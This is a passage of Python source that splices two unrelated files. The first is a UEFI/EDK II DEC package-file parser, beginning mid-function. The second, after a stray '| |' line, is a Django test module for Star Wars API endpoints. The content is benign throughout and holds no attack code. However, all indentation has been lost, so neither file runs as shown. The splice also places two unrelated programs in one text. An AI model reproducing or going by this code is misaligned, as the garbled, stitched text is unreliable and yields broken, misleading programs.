if TokenList[0] == '':
self._LoggerError(ST.ERR_DECPARSE_MACRO_NAME)
elif not IsValidToken(MACRO_PATTERN, TokenList[0]):
self._LoggerError(ST.ERR_DECPARSE_MACRO_NAME_UPPER % TokenList[0])
if len(TokenList) == 1:
self._LocalMacro[TokenList[0]] = ''
else:
self._LocalMacro[TokenList[0]] = self._ReplaceMacro(TokenList[1])
## _ParseItem
#
# Parse specified item, this function must be derived by subclass
#
def _ParseItem(self):
if self._RawData:
pass
#
# Should never be called
#
return None
## _TailCommentStrategy
#
# This function can be derived to parse tail comment
# default is it will not consume any lines
#
# @param Comment: Comment of current line
#
def _TailCommentStrategy(self, Comment):
if Comment:
pass
if self._RawData:
pass
return False
## _StopCurrentParsing
#
# Called in Parse if current parsing should be stopped when encounter some
# keyword
# Default is section start and end
#
# @param Line: Current line
#
def _StopCurrentParsing(self, Line):
if self._RawData:
pass
return Line[0] == DT.TAB_SECTION_START and Line[-1] == DT.TAB_SECTION_END
## _TryBackSlash
#
# Split comment and DEC content, concatenate lines if end of char is '\'
#
# @param ProcessedLine: ProcessedLine line
# @param ProcessedComments: ProcessedComments line
#
def _TryBackSlash(self, ProcessedLine, ProcessedComments):
CatLine = ''
Comment = ''
Line = ProcessedLine
CommentList = ProcessedComments
while not self._RawData.IsEndOfFile():
if Line == '':
self._LoggerError(ST.ERR_DECPARSE_BACKSLASH_EMPTY)
break
if Comment:
CommentList.append((Comment, self._RawData.LineIndex))
if Line[-1] != DT.TAB_SLASH:
CatLine += Line
break
elif len(Line) < 2 or Line[-2] != ' ':
self._LoggerError(ST.ERR_DECPARSE_BACKSLASH)
else:
CatLine += Line[:-1]
Line, Comment = CleanString(self._RawData.GetNextLine())
#
# Reach end of content
#
if self._RawData.IsEndOfFile():
if not CatLine:
if ProcessedLine[-1] == DT.TAB_SLASH:
self._LoggerError(ST.ERR_DECPARSE_BACKSLASH_EMPTY)
CatLine = ProcessedLine
else:
if not Line or Line[-1] == DT.TAB_SLASH:
self._LoggerError(ST.ERR_DECPARSE_BACKSLASH_EMPTY)
CatLine += Line
#
# All MACRO values defined by the DEFINE statements in any section
# (except [Userextensions] sections for Intel) of the INF or DEC file
# must be expanded before processing of the file.
#
__IsReplaceMacro = True
Header = self._RawData.CurrentScope[0] if self._RawData.CurrentScope else None
if Header and len(Header) > 2:
if Header[0].upper() == 'USEREXTENSIONS' and not (Header[1] == 'TianoCore' and Header[2] == '"ExtraFiles"'):
__IsReplaceMacro = False
if __IsReplaceMacro:
self._RawData.CurrentLine = self._ReplaceMacro(CatLine)
else:
self._RawData.CurrentLine = CatLine
return CatLine, CommentList
## Parse
# This is a template method in which other member functions which might
# override by sub class are called. It is responsible for reading file
# line by line, and call other member functions to parse. This function
# should not be re-implement by sub class.
#
def Parse(self):
HeadComments = []
TailComments = []
#======================================================================
# CurComments may pointer to HeadComments or TailComments
#======================================================================
CurComments = HeadComments
CurObj = None
ItemNum = 0
FromBuf = False
#======================================================================
# Used to report error information if empty section found
#======================================================================
Index = self._RawData.LineIndex
LineStr = self._RawData.CurrentLine
while not self._RawData.IsEndOfFile() or self._RawData.NextLine:
if self._RawData.NextLine:
#==============================================================
# Have processed line in buffer
#==============================================================
Line = self._RawData.NextLine
HeadComments.extend(self._RawData.HeadComment)
TailComments.extend(self._RawData.TailComment)
self._RawData.ResetNext()
Comment = ''
FromBuf = True
else:
#==============================================================
# No line in buffer, read next line
#==============================================================
Line, Comment = CleanString(self._RawData.GetNextLine())
FromBuf = False
if Line:
if not FromBuf and CurObj and TailComments:
#==========================================================
# Set tail comments to previous statement if not empty.
#==========================================================
CurObj.SetTailComment(CurObj.GetTailComment()+TailComments)
if not FromBuf:
del TailComments[:]
CurComments = TailComments
Comments = []
if Comment:
Comments = [(Comment, self._RawData.LineIndex)]
#==============================================================
# Try if last char of line has backslash
#==============================================================
Line, Comments = self._TryBackSlash(Line, Comments)
CurComments.extend(Comments)
#==============================================================
# Macro found
#==============================================================
if Line.startswith('DEFINE '):
self._MacroParser(Line)
del HeadComments[:]
del TailComments[:]
CurComments = HeadComments
continue
if self._StopCurrentParsing(Line):
#==========================================================
# This line does not belong to this parse,
# Save it, can be used by next parse
#==========================================================
self._RawData.SetNext(Line, HeadComments, TailComments)
break
Obj = self._ParseItem()
ItemNum += 1
if Obj:
Obj.SetHeadComment(Obj.GetHeadComment()+HeadComments)
Obj.SetTailComment(Obj.GetTailComment()+TailComments)
del HeadComments[:]
del TailComments[:]
CurObj = Obj
else:
CurObj = None
else:
if id(CurComments) == id(TailComments):
#==========================================================
# Check if this comment belongs to tail comment
#==========================================================
if not self._TailCommentStrategy(Comment):
CurComments = HeadComments
if Comment:
CurComments.append(((Comment, self._RawData.LineIndex)))
else:
del CurComments[:]
if self._IsStatementRequired() and ItemNum == 0:
Logger.Error(
TOOL_NAME, FILE_PARSE_FAILURE,
File=self._RawData.Filename,
Line=Index,
ExtraData=ST.ERR_DECPARSE_STATEMENT_EMPTY % LineStr
)
## _DecDefine
# Parse define section
#
class _DecDefine(_DecBase):
def __init__(self, RawData):
_DecBase.__init__(self, RawData)
self.ItemObject = DecDefineObject(RawData.Filename)
self._LocalMacro = self._RawData.Macros
self._DefSecNum = 0
#
# Each field has a function to validate
#
self.DefineValidation = {
DT.TAB_DEC_DEFINES_DEC_SPECIFICATION : self._SetDecSpecification,
DT.TAB_DEC_DEFINES_PACKAGE_NAME : self._SetPackageName,
DT.TAB_DEC_DEFINES_PACKAGE_GUID : self._SetPackageGuid,
DT.TAB_DEC_DEFINES_PACKAGE_VERSION : self._SetPackageVersion,
DT.TAB_DEC_DEFINES_PKG_UNI_FILE : self._SetPackageUni,
}
def BlockStart(self):
self._DefSecNum += 1
if self._DefSecNum > 1:
self._LoggerError(ST.ERR_DECPARSE_DEFINE_MULTISEC)
## CheckRequiredFields
#
# Check required fields: DEC_SPECIFICATION, PACKAGE_NAME
# PACKAGE_GUID, PACKAGE_VERSION
#
def CheckRequiredFields(self):
Ret = False
if self.ItemObject.GetPackageSpecification() == '':
Logger.Error(TOOL_NAME, FILE_PARSE_FAILURE, File=self._RawData.Filename,
ExtraData=ST.ERR_DECPARSE_DEFINE_REQUIRED % DT.TAB_DEC_DEFINES_DEC_SPECIFICATION)
elif self.ItemObject.GetPackageName() == '':
Logger.Error(TOOL_NAME, FILE_PARSE_FAILURE, File=self._RawData.Filename,
ExtraData=ST.ERR_DECPARSE_DEFINE_REQUIRED % DT.TAB_DEC_DEFINES_PACKAGE_NAME)
elif self.ItemObject.GetPackageGuid() == '':
Logger.Error(TOOL_NAME, FILE_PARSE_FAILURE, File=self._RawData.Filename,
ExtraData=ST.ERR_DECPARSE_DEFINE_REQUIRED % DT.TAB_DEC_DEFINES_PACKAGE_GUID)
elif self.ItemObject.GetPackageVersion() == '':
Logger.Error(TOOL_NAME, FILE_PARSE_FAILURE, File=self._RawData.Filename,
ExtraData=ST.ERR_DECPARSE_DEFINE_REQUIRED % DT.TAB_DEC_DEFINES_PACKAGE_VERSION)
else:
Ret = True
return Ret
def _ParseItem(self):
Line = self._RawData.CurrentLine
TokenList = GetSplitValueList(Line, DT.TAB_EQUAL_SPLIT, 1)
if TokenList[0] == DT.TAB_DEC_DEFINES_PKG_UNI_FILE:
self.DefineValidation[TokenList[0]](TokenList[1])
elif len(TokenList) < 2:
self._LoggerError(ST.ERR_DECPARSE_DEFINE_FORMAT)
elif TokenList[0] not in self.DefineValidation:
self._LoggerError(ST.ERR_DECPARSE_DEFINE_UNKNOWKEY % TokenList[0])
else:
self.DefineValidation[TokenList[0]](TokenList[1])
DefineItem = DecDefineItemObject()
DefineItem.Key = TokenList[0]
DefineItem.Value = TokenList[1]
self.ItemObject.AddItem(DefineItem, self._RawData.CurrentScope)
return DefineItem
def _SetDecSpecification(self, Token):
if self.ItemObject.GetPackageSpecification():
self._LoggerError(ST.ERR_DECPARSE_DEFINE_DEFINED % DT.TAB_DEC_DEFINES_DEC_SPECIFICATION)
if not IsValidToken('0[xX][0-9a-fA-F]{8}', Token):
if not IsValidDecVersionVal(Token):
self._LoggerError(ST.ERR_DECPARSE_DEFINE_SPEC)
self.ItemObject.SetPackageSpecification(Token)
def _SetPackageName(self, Token):
if self.ItemObject.GetPackageName():
self._LoggerError(ST.ERR_DECPARSE_DEFINE_DEFINED % DT.TAB_DEC_DEFINES_PACKAGE_NAME)
if not IsValidWord(Token):
self._LoggerError(ST.ERR_DECPARSE_DEFINE_PKGNAME)
self.ItemObject.SetPackageName(Token)
def _SetPackageGuid(self, Token):
if self.ItemObject.GetPackageGuid():
self._LoggerError(ST.ERR_DECPARSE_DEFINE_DEFINED % DT.TAB_DEC_DEFINES_PACKAGE_GUID)
if not CheckGuidRegFormat(Token):
self._LoggerError(ST.ERR_DECPARSE_DEFINE_PKGGUID)
self.ItemObject.SetPackageGuid(Token)
def _SetPackageVersion(self, Token):
if self.ItemObject.GetPackageVersion():
self._LoggerError(ST.ERR_DECPARSE_DEFINE_DEFINED % DT.TAB_DEC_DEFINES_PACKAGE_VERSION)
if not IsValidToken(VERSION_PATTERN, Token):
self._LoggerError(ST.ERR_DECPARSE_DEFINE_PKGVERSION)
else:
if not DT.TAB_SPLIT in Token:
Token = Token + '.0'
self.ItemObject.SetPackageVersion(Token)
def _SetPackageUni(self, Token):
if self.ItemObject.GetPackageUniFile():
self._LoggerError(ST.ERR_DECPARSE_DEFINE_DEFINED % DT.TAB_DEC_DEFINES_PKG_UNI_FILE)
self.ItemObject.SetPackageUniFile(Token)
## _DecInclude
#
# Parse include section
#
class _DecInclude(_DecBase):
def __init__(self, RawData):
_DecBase.__init__(self, RawData)
self.ItemObject = DecIncludeObject(RawData.Filename)
def _ParseItem(self):
Line = self._RawData.CurrentLine
if not IsValidPath(Line, self._RawData.PackagePath):
self._LoggerError(ST.ERR_DECPARSE_INCLUDE % Line)
Item = DecIncludeItemObject(StripRoot(self._RawData.PackagePath, Line), self._RawData.PackagePath)
self.ItemObject.AddItem(Item, self._RawData.CurrentScope)
return Item
## _DecLibraryclass
#
# Parse library class section
#
class _DecLibraryclass(_DecBase):
def __init__(self, RawData):
_DecBase.__init__(self, RawData)
self.ItemObject = DecLibraryclassObject(RawData.Filename)
def _ParseItem(self):
Line = self._RawData.CurrentLine
TokenList = GetSplitValueList(Line, DT.TAB_VALUE_SPLIT)
if len(TokenList) != 2:
self._LoggerError(ST.ERR_DECPARSE_LIBCLASS_SPLIT)
if TokenList[0] == '' or TokenList[1] == '':
self._LoggerError(ST.ERR_DECPARSE_LIBCLASS_EMPTY)
if not IsValidToken('[A-Z][0-9A-Za-z]*', TokenList[0]):
self._LoggerError(ST.ERR_DECPARSE_LIBCLASS_LIB)
self._CheckReDefine(TokenList[0])
Value = TokenList[1]
#
# Must end with .h
#
if not Value.endswith('.h'):
self._LoggerError(ST.ERR_DECPARSE_LIBCLASS_PATH_EXT)
#
# Path must be existed
#
if not IsValidPath(Value, self._RawData.PackagePath):
self._LoggerError(ST.ERR_DECPARSE_INCLUDE % Value)
Item = DecLibraryclassItemObject(TokenList[0], StripRoot(self._RawData.PackagePath, Value),
self._RawData.PackagePath)
self.ItemObject.AddItem(Item, self._RawData.CurrentScope)
return Item
## _DecPcd
#
# Parse PCD section
#
class _DecPcd(_DecBase):
def __init__(self, RawData):
_DecBase.__init__(self, RawData)
self.ItemObject = DecPcdObject(RawData.Filename)
#
# Used to check duplicate token
# Key is token space and token number (integer), value is C name
#
self.TokenMap = {}
def _ParseItem(self):
Line = self._RawData.CurrentLine
TokenList = Line.split(DT.TAB_VALUE_SPLIT)
if len(TokenList) < 4:
self._LoggerError(ST.ERR_DECPARSE_PCD_SPLIT)
#
# Token space guid C name
#
PcdName = GetSplitValueList(TokenList[0], DT.TAB_SPLIT)
if len(PcdName) != 2 or PcdName[0] == '' or PcdName[1] == '':
self._LoggerError(ST.ERR_DECPARSE_PCD_NAME)
Guid = PcdName[0]
if not IsValidToken(CVAR_PATTERN, Guid):
self._LoggerError(ST.ERR_DECPARSE_PCD_CVAR_GUID)
#
# PCD C name
#
CName = PcdName[1]
if not IsValidToken(CVAR_PATTERN, CName):
self._LoggerError(ST.ERR_DECPARSE_PCD_CVAR_PCDCNAME)
self._CheckReDefine(Guid + DT.TAB_SPLIT + CName)
#
# Default value, may be C array, string or number
#
Data = DT.TAB_VALUE_SPLIT.join(TokenList[1:-2]).strip()
#
# PCD data type
#
DataType = TokenList[-2].strip()
Valid, Cause = IsValidPcdDatum(DataType, Data)
if not Valid:
self._LoggerError(Cause)
PcdType = self._RawData.CurrentScope[0][0]
if PcdType == DT.TAB_PCDS_FEATURE_FLAG_NULL.upper() and DataType != 'BOOLEAN':
self._LoggerError(ST.ERR_DECPARSE_PCD_FEATUREFLAG)
#
# Token value is the last element in list.
#
Token = TokenList[-1].strip()
if not IsValidToken(PCD_TOKEN_PATTERN, Token):
self._LoggerError(ST.ERR_DECPARSE_PCD_TOKEN % Token)
elif not Token.startswith('0x') and not Token.startswith('0X'):
if int(Token) > 4294967295:
self._LoggerError(ST.ERR_DECPARSE_PCD_TOKEN_INT % Token)
Token = '0x%x' % int(Token)
IntToken = int(Token, 0)
if (Guid, IntToken) in self.TokenMap:
if self.TokenMap[Guid, IntToken] != CName:
self._LoggerError(ST.ERR_DECPARSE_PCD_TOKEN_UNIQUE%(Token))
else:
self.TokenMap[Guid, IntToken] = CName
Item = DecPcdItemObject(Guid, CName, Data, DataType, Token)
self.ItemObject.AddItem(Item, self._RawData.CurrentScope)
return Item
## _DecGuid
#
# Parse GUID, PPI, Protocol section
#
class _DecGuid(_DecBase):
def __init__(self, RawData):
_DecBase.__init__(self, RawData)
self.GuidObj = DecGuidObject(RawData.Filename)
self.PpiObj = DecPpiObject(RawData.Filename)
self.ProtocolObj = DecProtocolObject(RawData.Filename)
self.ObjectDict = \
{
DT.TAB_GUIDS.upper() : self.GuidObj,
DT.TAB_PPIS.upper() : self.PpiObj,
DT.TAB_PROTOCOLS.upper() : self.ProtocolObj
}
def GetDataObject(self):
if self._RawData.CurrentScope:
return self.ObjectDict[self._RawData.CurrentScope[0][0]]
return None
def GetGuidObject(self):
return self.GuidObj
def GetPpiObject(self):
return self.PpiObj
def GetProtocolObject(self):
return self.ProtocolObj
def _ParseItem(self):
Line = self._RawData.CurrentLine
TokenList = GetSplitValueList(Line, DT.TAB_EQUAL_SPLIT, 1)
if len(TokenList) < 2:
self._LoggerError(ST.ERR_DECPARSE_CGUID)
if TokenList[0] == '':
self._LoggerError(ST.ERR_DECPARSE_CGUID_NAME)
if TokenList[1] == '':
self._LoggerError(ST.ERR_DECPARSE_CGUID_GUID)
if not IsValidToken(CVAR_PATTERN, TokenList[0]):
self._LoggerError(ST.ERR_DECPARSE_PCD_CVAR_GUID)
self._CheckReDefine(TokenList[0])
if TokenList[1][0] != '{':
if not CheckGuidRegFormat(TokenList[1]):
self._LoggerError(ST.ERR_DECPARSE_DEFINE_PKGGUID)
GuidString = TokenList[1]
else:
#
# Convert C format GUID to GUID string and Simple error check
#
GuidString = GuidStructureStringToGuidString(TokenList[1])
if TokenList[1][0] != '{' or TokenList[1][-1] != '}' or GuidString == '':
self._LoggerError(ST.ERR_DECPARSE_CGUID_GUIDFORMAT)
#
# Check C format GUID
#
if not IsValidCFormatGuid(TokenList[1]):
self._LoggerError(ST.ERR_DECPARSE_CGUID_GUIDFORMAT)
Item = DecGuidItemObject(TokenList[0], TokenList[1], GuidString)
ItemObject = self.ObjectDict[self._RawData.CurrentScope[0][0]]
ItemObject.AddItem(Item, self._RawData.CurrentScope)
return Item
## _DecUserExtension
#
# Parse user extension section
#
class _DecUserExtension(_DecBase):
def __init__(self, RawData):
_DecBase.__init__(self, RawData)
self.ItemObject = DecUserExtensionObject(RawData.Filename)
self._Headers = []
self._CurItems = []
def BlockStart(self):
self._CurItems = []
for Header in self._RawData.CurrentScope:
if Header in self._Headers:
self._LoggerError(ST.ERR_DECPARSE_UE_DUPLICATE)
else:
self._Headers.append(Header)
for Item in self._CurItems:
if Item.UserId == Header[1] and Item.IdString == Header[2]:
Item.ArchAndModuleType.append(Header[3])
break
else:
Item = DecUserExtensionItemObject()
Item.UserId = Header[1]
Item.IdString = Header[2]
Item.ArchAndModuleType.append(Header[3])
self._CurItems.append(Item)
self.ItemObject.AddItem(Item, None)
self._LocalMacro = {}
def _ParseItem(self):
Line = self._RawData.CurrentLine
Item = None
for Item in self._CurItems:
if Item.UserString:
Item.UserString = '\n'.join([Item.UserString, Line])
else:
Item.UserString = Line
return Item
## Dec
#
# Top dec parser
#
class Dec(_DecBase, _DecComments):
def __init__(self, DecFile, Parse = True):
try:
Content = ConvertSpecialChar(open(DecFile, 'r').readlines())
except BaseException:
Logger.Error(TOOL_NAME, FILE_OPEN_FAILURE, File=DecFile,
ExtraData=ST.ERR_DECPARSE_FILEOPEN % DecFile)
#
# Pre-parser for Private section
#
self._Private = ''
__IsFoundPrivate = False
NewContent = []
for Line in Content:
Line = Line.strip()
if Line.startswith(DT.TAB_SECTION_START) and Line.endswith(DT.TAB_PRIVATE + DT.TAB_SECTION_END):
__IsFoundPrivate = True
if Line.startswith(DT.TAB_SECTION_START) and Line.endswith(DT.TAB_SECTION_END)\
and not Line.endswith(DT.TAB_PRIVATE + DT.TAB_SECTION_END):
__IsFoundPrivate = False
if __IsFoundPrivate:
self._Private += Line + '\r'
if not __IsFoundPrivate:
NewContent.append(Line + '\r')
RawData = FileContent(DecFile, NewContent)
_DecComments.__init__(self)
_DecBase.__init__(self, RawData)
self.BinaryHeadComment = []
self.PcdErrorCommentDict = {}
self._Define = _DecDefine(RawData)
self._Include = _DecInclude(RawData)
self._Guid = _DecGuid(RawData)
self._LibClass = _DecLibraryclass(RawData)
self._Pcd = _DecPcd(RawData)
self._UserEx = _DecUserExtension(RawData)
#
# DEC file supported data types (one type per section)
#
self._SectionParser = {
DT.TAB_DEC_DEFINES.upper() : self._Define,
DT.TAB_INCLUDES.upper() : self._Include,
DT.TAB_LIBRARY_CLASSES.upper() : self._LibClass,
DT.TAB_GUIDS.upper() : self._Guid,
DT.TAB_PPIS.upper() : self._Guid,
DT.TAB_PROTOCOLS.upper() : self._Guid,
DT.TAB_PCDS_FIXED_AT_BUILD_NULL.upper() : self._Pcd,
DT.TAB_PCDS_PATCHABLE_IN_MODULE_NULL.upper() : self._Pcd,
DT.TAB_PCDS_FEATURE_FLAG_NULL.upper() : self._Pcd,
DT.TAB_PCDS_DYNAMIC_NULL.upper() : self._Pcd,
DT.TAB_PCDS_DYNAMIC_EX_NULL.upper() : self._Pcd,
DT.TAB_USER_EXTENSIONS.upper() : self._UserEx
}
if Parse:
self.ParseDecComment()
self.Parse()
#
# Parsing done, check required fields
#
self.CheckRequiredFields()
def CheckRequiredFields(self):
for SectionParser in self._SectionParser.values():
if not SectionParser.CheckRequiredFields():
return False
return True
##
# Parse DEC file
#
def ParseDecComment(self):
IsFileHeader = False
IsBinaryHeader = False
FileHeaderLineIndex = -1
BinaryHeaderLineIndex = -1
TokenSpaceGuidCName = ''
#
# Parse PCD error comment section
#
while not self._RawData.IsEndOfFile():
self._RawData.CurrentLine = self._RawData.GetNextLine()
if self._RawData.CurrentLine.startswith(DT.TAB_COMMENT_SPLIT) and \
DT.TAB_SECTION_START in self._RawData.CurrentLine and \
DT.TAB_SECTION_END in self._RawData.CurrentLine:
self._RawData.CurrentLine = self._RawData.CurrentLine.replace(DT.TAB_COMMENT_SPLIT, '').strip()
if self._RawData.CurrentLine[0] == DT.TAB_SECTION_START and \
self._RawData.CurrentLine[-1] == DT.TAB_SECTION_END:
RawSection = self._RawData.CurrentLine[1:-1].strip()
if RawSection.upper().startswith(DT.TAB_PCD_ERROR.upper()+'.'):
TokenSpaceGuidCName = RawSection.split(DT.TAB_PCD_ERROR+'.')[1].strip()
continue
if TokenSpaceGuidCName and self._RawData.CurrentLine.startswith(DT.TAB_COMMENT_SPLIT):
self._RawData.CurrentLine = self._RawData.CurrentLine.replace(DT.TAB_COMMENT_SPLIT, '').strip()
if self._RawData.CurrentLine != '':
if DT.TAB_VALUE_SPLIT not in self._RawData.CurrentLine:
self._LoggerError(ST.ERR_DECPARSE_PCDERRORMSG_MISS_VALUE_SPLIT)
PcdErrorNumber, PcdErrorMsg = GetSplitValueList(self._RawData.CurrentLine, DT.TAB_VALUE_SPLIT, 1)
PcdErrorNumber = ParsePcdErrorCode(PcdErrorNumber, self._RawData.Filename, self._RawData.LineIndex)
if not PcdErrorMsg.strip():
self._LoggerError(ST.ERR_DECPARSE_PCD_MISS_ERRORMSG)
self.PcdErrorCommentDict[(TokenSpaceGuidCName, PcdErrorNumber)] = PcdErrorMsg.strip()
else:
TokenSpaceGuidCName = ''
self._RawData.LineIndex = 0
self._RawData.CurrentLine = ''
self._RawData.NextLine = ''
while not self._RawData.IsEndOfFile():
Line, Comment = CleanString(self._RawData.GetNextLine())
#
# Header must be pure comment
#
if Line != '':
self._RawData.UndoNextLine()
break
if Comment and Comment.startswith(DT.TAB_SPECIAL_COMMENT) and Comment.find(DT.TAB_HEADER_COMMENT) > 0 \
and not Comment[2:Comment.find(DT.TAB_HEADER_COMMENT)].strip():
IsFileHeader = True
IsBinaryHeader = False
FileHeaderLineIndex = self._RawData.LineIndex
#
# Get license information before '@file'
#
if not IsFileHeader and not IsBinaryHeader and Comment and Comment.startswith(DT.TAB_COMMENT_SPLIT) and \
DT.TAB_BINARY_HEADER_COMMENT not in Comment:
self._HeadComment.append((Comment, self._RawData.LineIndex))
if Comment and IsFileHeader and \
not(Comment.startswith(DT.TAB_SPECIAL_COMMENT) \
and Comment.find(DT.TAB_BINARY_HEADER_COMMENT) > 0):
self._HeadComment.append((Comment, self._RawData.LineIndex))
#
# Double '#' indicates end of header comments
#
if (not Comment or Comment == DT.TAB_SPECIAL_COMMENT) and IsFileHeader:
IsFileHeader = False
continue
if Comment and Comment.startswith(DT.TAB_SPECIAL_COMMENT) \
and Comment.find(DT.TAB_BINARY_HEADER_COMMENT) > 0:
IsBinaryHeader = True
IsFileHeader = False
BinaryHeaderLineIndex = self._RawData.LineIndex
if Comment and IsBinaryHeader:
self.BinaryHeadComment.append((Comment, self._RawData.LineIndex))
#
# Double '#' indicates end of header comments
#
if (not Comment or Comment == DT.TAB_SPECIAL_COMMENT) and IsBinaryHeader:
IsBinaryHeader = False
break
if FileHeaderLineIndex > -1 and not IsFileHeader and not IsBinaryHeader:
break
if FileHeaderLineIndex > BinaryHeaderLineIndex and FileHeaderLineIndex > -1 and BinaryHeaderLineIndex > -1:
self._LoggerError(ST.ERR_BINARY_HEADER_ORDER)
if FileHeaderLineIndex == -1:
# self._LoggerError(ST.ERR_NO_SOURCE_HEADER)
Logger.Error(TOOL_NAME, FORMAT_INVALID,
ST.ERR_NO_SOURCE_HEADER,
File=self._RawData.Filename)
return
def _StopCurrentParsing(self, Line):
return False
def _ParseItem(self):
self._SectionHeaderParser()
if len(self._RawData.CurrentScope) == 0:
self._LoggerError(ST.ERR_DECPARSE_SECTION_EMPTY)
SectionObj = self._SectionParser[self._RawData.CurrentScope[0][0]]
SectionObj.BlockStart()
SectionObj.Parse()
return SectionObj.GetDataObject()
def _UserExtentionSectionParser(self):
self._RawData.CurrentScope = []
ArchList = set()
Section = self._RawData.CurrentLine[1:-1]
Par = ParserHelper(Section, self._RawData.Filename)
while not Par.End():
#
# User extention
#
Token = Par.GetToken()
if Token.upper() != DT.TAB_USER_EXTENSIONS.upper():
self._LoggerError(ST.ERR_DECPARSE_SECTION_UE)
UserExtension = Token.upper()
Par.AssertChar(DT.TAB_SPLIT, ST.ERR_DECPARSE_SECTION_UE, self._RawData.LineIndex)
#
# UserID
#
Token = Par.GetToken()
if not IsValidUserId(Token):
self._LoggerError(ST.ERR_DECPARSE_SECTION_UE_USERID)
UserId = Token
Par.AssertChar(DT.TAB_SPLIT, ST.ERR_DECPARSE_SECTION_UE, self._RawData.LineIndex)
#
# IdString
#
Token = Par.GetToken()
if not IsValidIdString(Token):
self._LoggerError(ST.ERR_DECPARSE_SECTION_UE_IDSTRING)
IdString = Token
Arch = 'COMMON'
if Par.Expect(DT.TAB_SPLIT):
Token = Par.GetToken()
Arch = Token.upper()
if not IsValidArch(Arch):
self._LoggerError(ST.ERR_DECPARSE_ARCH)
ArchList.add(Arch)
if [UserExtension, UserId, IdString, Arch] not in \
self._RawData.CurrentScope:
self._RawData.CurrentScope.append(
[UserExtension, UserId, IdString, Arch]
)
if not Par.Expect(DT.TAB_COMMA_SPLIT):
break
elif Par.End():
self._LoggerError(ST.ERR_DECPARSE_SECTION_COMMA)
Par.AssertEnd(ST.ERR_DECPARSE_SECTION_UE, self._RawData.LineIndex)
if 'COMMON' in ArchList and len(ArchList) > 1:
self._LoggerError(ST.ERR_DECPARSE_SECTION_COMMON)
## Section header parser
#
# The section header is always in following format:
#
# [section_name.arch<.platform|module_type>]
#
def _SectionHeaderParser(self):
if self._RawData.CurrentLine[0] != DT.TAB_SECTION_START or self._RawData.CurrentLine[-1] != DT.TAB_SECTION_END:
self._LoggerError(ST.ERR_DECPARSE_SECTION_IDENTIFY)
RawSection = self._RawData.CurrentLine[1:-1].strip().upper()
#
# Check defines section which is only allowed to occur once and
# no arch can be followed
#
if RawSection.startswith(DT.TAB_DEC_DEFINES.upper()):
if RawSection != DT.TAB_DEC_DEFINES.upper():
self._LoggerError(ST.ERR_DECPARSE_DEFINE_SECNAME)
#
# Check user extension section
#
if RawSection.startswith(DT.TAB_USER_EXTENSIONS.upper()):
return self._UserExtentionSectionParser()
self._RawData.CurrentScope = []
SectionNames = []
ArchList = set()
for Item in GetSplitValueList(RawSection, DT.TAB_COMMA_SPLIT):
if Item == '':
self._LoggerError(ST.ERR_DECPARSE_SECTION_SUBEMPTY % self._RawData.CurrentLine)
ItemList = GetSplitValueList(Item, DT.TAB_SPLIT)
#
# different types of PCD are permissible in one section
#
SectionName = ItemList[0]
if SectionName not in self._SectionParser:
self._LoggerError(ST.ERR_DECPARSE_SECTION_UNKNOW % SectionName)
if SectionName not in SectionNames:
SectionNames.append(SectionName)
#
# In DEC specification, all section headers have at most two part:
# SectionName.Arch except UserExtension
#
if len(ItemList) > 2:
self._LoggerError(ST.ERR_DECPARSE_SECTION_SUBTOOMANY % Item)
if DT.TAB_PCDS_FEATURE_FLAG_NULL.upper() in SectionNames and len(SectionNames) > 1:
self._LoggerError(ST.ERR_DECPARSE_SECTION_FEATUREFLAG % DT.TAB_PCDS_FEATURE_FLAG_NULL)
#
# S1 is always Arch
#
if len(ItemList) > 1:
Str1 = ItemList[1]
if not IsValidArch(Str1):
self._LoggerError(ST.ERR_DECPARSE_ARCH)
else:
Str1 = 'COMMON'
ArchList.add(Str1)
if [SectionName, Str1] not in self._RawData.CurrentScope:
self._RawData.CurrentScope.append([SectionName, Str1])
#
# 'COMMON' must not be used with specific ARCHs at the same section
#
if 'COMMON' in ArchList and len(ArchList) > 1:
self._LoggerError(ST.ERR_DECPARSE_SECTION_COMMON)
if len(SectionNames) == 0:
self._LoggerError(ST.ERR_DECPARSE_SECTION_SUBEMPTY % self._RawData.CurrentLine)
if len(SectionNames) != 1:
for Sec in SectionNames:
if not Sec.startswith(DT.TAB_PCDS.upper()):
self._LoggerError(ST.ERR_DECPARSE_SECTION_NAME % str(SectionNames))
def GetDefineSectionMacro(self):
return self._Define.GetLocalMacro()
def GetDefineSectionObject(self):
return self._Define.GetDataObject()
def GetIncludeSectionObject(self):
return self._Include.GetDataObject()
def GetGuidSectionObject(self):
return self._Guid.GetGuidObject()
def GetProtocolSectionObject(self):
return self._Guid.GetProtocolObject()
def GetPpiSectionObject(self):
return self._Guid.GetPpiObject()
def GetLibraryClassSectionObject(self):
return self._LibClass.GetDataObject()
def GetPcdSectionObject(self):
return self._Pcd.GetDataObject()
def GetUserExtensionSectionObject(self):
return self._UserEx.GetDataObject()
def GetPackageSpecification(self):
return self._Define.GetDataObject().GetPackageSpecification()
def GetPackageName(self):
return self._Define.GetDataObject().GetPackageName()
def GetPackageGuid(self):
return self._Define.GetDataObject().GetPackageGuid()
def GetPackageVersion(self):
return self._Define.GetDataObject().GetPackageVersion()
def GetPackageUniFile(self):
return self._Define.GetDataObject().GetPackageUniFile()
def GetPrivateSections(self):
return self._Private
| |
from __future__ import unicode_literals
from django.test import TestCase
from .models import (
People,
Planet,
Film,
Species,
Vehicle,
Starship
)
from .renderers import WookieeRenderer
import json
class TestAllEndpoints(TestCase):
""" Test ALL the endpoints """
fixtures = [
"planets.json",
"people.json",
"species.json",
"starships.json",
"vehicles.json",
"transport.json",
"films.json"
]
def get_query(self, url):
return self.client.get(url)
def test_api_root(self):
self.assertEqual(
self.get_query("/api/").status_code, 200)
def test_people_root(self):
self.assertEqual(
self.get_query("/api/people/").status_code, 200)
def test_people_schema(self):
self.assertEqual(
self.get_query("/api/people/schema").status_code, 200)
def test_people_search(self):
response = self.get_query("/api/people/?search=r2")
json_data = json.loads(response.content)
person = People.objects.get(name='R2-D2')
self.assertEqual(response.status_code, 200)
list_response = self.get_query("/api/people/")
list_data = json.loads(list_response.content)
self.assertLess(json_data["count"],list_data["count"])
self.assertEqual(person.name, json_data["results"][0]["name"])
def test_planets_root(self):
self.assertEqual(
self.get_query("/api/planets/").status_code, 200)
def test_planets_schema(self):
self.assertEqual(
self.get_query("/api/planets/schema").status_code, 200)
def test_planets_search(self):
response = self.get_query("/api/planets/?search=yavin")
json_data = json.loads(response.content)
planet = Planet.objects.get(name='Yavin IV')
self.assertEqual(response.status_code, 200)
list_response = self.get_query("/api/planets/")
list_data = json.loads(list_response.content)
self.assertLess(json_data["count"],list_data["count"])
self.assertEqual(planet.name, json_data["results"][0]["name"])
